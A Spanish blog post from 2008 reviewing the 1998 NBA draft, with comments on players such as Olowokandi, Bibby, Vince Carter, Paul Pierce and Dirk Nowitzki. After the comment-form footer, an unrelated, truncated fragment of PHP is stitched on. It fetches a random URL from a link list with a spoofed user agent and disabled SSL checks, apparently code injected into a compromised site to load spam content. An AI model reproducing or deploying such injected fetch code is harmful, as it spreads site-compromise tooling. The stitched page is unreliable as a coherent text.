La prisa por hacerse mayor rápido: Draft 1998

23 de June de 2008 por Viva_Dirk

En 1998 no se vio una elección de un jugador de instituto hasta el Nº25, donde los equipos ya no necesitan de ese jugador para funcionar de manera inmediata, sino que buscan el mayor potencial posible, algo que pueda convertir a un buen equipo en uno mejor pero sin prisa ni presión. En este caso fue Indiana quien eligió a Al Harrington y en el Nº32 Seattle se hacía con Rashard Lewis. Lewis ha alcanzado la vitola de All-Star y Harrington ha rendido mas que algunos de los que fueron elegidos delante suyo. No tuvieron ningun tipo de presión en sus primeros años en la liga, lo que ha dado jugadores bien formados y con largas trayectorias.

El top ten estuvo repleto de jugadores con varios años de experiencia universitaria, exceptuando a un Dirk Nowitzki que llegó desde la 2ª división alemana y a Larry Hughes que solo estuvo un año en St. Louis. Los Clippers cometieron uno de los mayores fiascos de la historia al elegir con el Nº1 a un pívot que había destacado en una universidad muy pequeña, Michael Olowokandi, uno de los peores Nº1 de los últimos tiempo, en dura pugna con Kwame Brown. Mucha mejor carrera tuvo el número 2 de aquel draft, Mike Bibby. Con 2 años en Arizona llegaba con la etiqueta de base anotador y buen defensor y para los que somos de la generación plus no hace falta que digamos nada de sus años en los Kings. Raef Lafrentz, machacado posteriormente por las lesiones, dio el salto junto a su compañero en Kansas, Paul Pierce que fue elegido en el puesto Nº10. Pierce ha sido otro los jugadores que ha conseguido cambiar el rumbo errático de una franquicia, en este caso Boston.

Desde North Carolina llegaron 2 grandes jugadores: Vince Carter y Antawn Jamison. Carter fue rookie del año y su potencial parecía no tener fin. Sus acciones por encima del aro fueron visionadas una y otra vez por todo el planeta y solo una lesión de rodilla ha dejado en un nivel menor lo que parecía la carrera de una leyenda de la NBA. Jamison se instaló, apartir de su segundo año, entre los anotadores mas solventes de la liga y tanto desde la posición de 3 como de 4 sus abundantes recursos ofensivos no han dejado de dar fruto. En cambio, Larry Hughes y Jason Williams han tenido carreras muy irregulares, el primero debido a sus problemas físicos y sus contínuas lesiones y el segundo porque, pese a la revolución que llevó a las canchas, el miedo a su no-defensa y a una cabeza no muy bien amueblada dejó en un segundo plano todo el talento que acumulaba. Y por último hay que destacar el caso de Dirk Nowitzki, número 9 de aquel draft, único en la historia. Jugador llegado desde la 2ª división alemana que en su segundo año ya alcanzaba los 17 puntos por encuentro y en la 3ª era toda una estrella de la liga. Simplemente asombroso. En Milwaukke no pueden olvidar el día que mandaron al alemán a los Mavs a cambio de otro rookie: Robert “Tractor” Traylor, que se quedó muy lejos de lo que apuntaba.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>